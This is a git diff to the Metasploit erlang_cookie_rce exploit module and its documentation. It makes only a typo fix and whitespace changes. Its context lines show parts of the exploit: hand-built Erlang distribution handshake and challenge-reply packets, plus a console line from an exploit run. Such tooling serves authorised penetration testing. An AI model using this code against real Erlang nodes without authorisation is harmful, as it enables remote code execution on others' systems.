diff --git a/documentation/modules/exploit/multi/misc/erlang_cookie_rce.md b/documentation/modules/exploit/multi/misc/erlang_cookie_rce.md index 3f049ecdc2..2743af8529 100644 --- a/documentation/modules/exploit/multi/misc/erlang_cookie_rce.md +++ b/documentation/modules/exploit/multi/misc/erlang_cookie_rce.md @@ -113,7 +113,7 @@ msf exploit(multi/misc/erlang_cookie_rce) > exploit [*] Exploit completed, but no session was created. ``` -Once exploitation is complete the tester can authenticate. Another method that can be used it SMB as shown below. +Once exploitation is complete the tester can authenticate. Another method that can be used is SMB as shown below. exploit.rc -> ``` diff --git a/modules/exploits/multi/misc/erlang_cookie_rce.rb b/modules/exploits/multi/misc/erlang_cookie_rce.rb index 3d000c19c2..ef29c683a9 100644 --- a/modules/exploits/multi/misc/erlang_cookie_rce.rb +++ b/modules/exploits/multi/misc/erlang_cookie_rce.rb @@ -79,7 +79,7 @@ class MetasploitModule < Msf::Exploit::Remote send_name << "\x00\x05" # Version: R6 (5) send_name << "\x00\x03\x49\x9c" # Flags (0x0003499c) send_name << "#{our_node}" # @ - + # SEND_CHALLENGE_REPLY: return generated digest and its own challenge send_challenge_reply = "\x00\x15" # Length: 21 send_challenge_reply << "\x72" # Tag: r @@ -94,7 +94,7 @@ class MetasploitModule < Msf::Exploit::Remote send << "\x61" # SMALL_INTEGER_EXT send << "\x06" # Int: 6 send << "\x67" # PID_EXT (103) - send << "\x64\x00" # Node: + send << "\x64\x00" # Node: send << [(our_node.length).to_s(16)].pack('H*') # Length: strlen(Node) send << "#{our_node}" # Node send << "\x00\x00\x00\x03" # ID